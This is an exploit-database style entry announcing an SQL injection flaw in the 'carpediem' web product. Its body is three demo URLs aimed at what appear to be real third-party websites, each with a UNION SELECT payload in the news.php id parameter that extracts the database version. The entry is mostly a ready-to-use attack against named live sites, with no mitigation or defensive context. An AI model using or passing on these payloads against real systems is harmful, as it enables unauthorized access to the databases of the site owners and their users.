*********************************************************
#Exploit Title: carpediem – SQL Injection vulnerability
#Date: 2020-08-16
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://www.carpediem.at
#Category:webapps
#Tested On: windows 10, Firefox
Demo 1:
https://www.taborskyprofil.com/news.php?id=-71%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Demo 2:
https://www.pur-landsee.at/news.php?id=-37%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Demo 3:
http://www.gasthof-berlakovich.at/news.php?id=-52%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email : mr.mansoori@yahoo.com
*********************************************************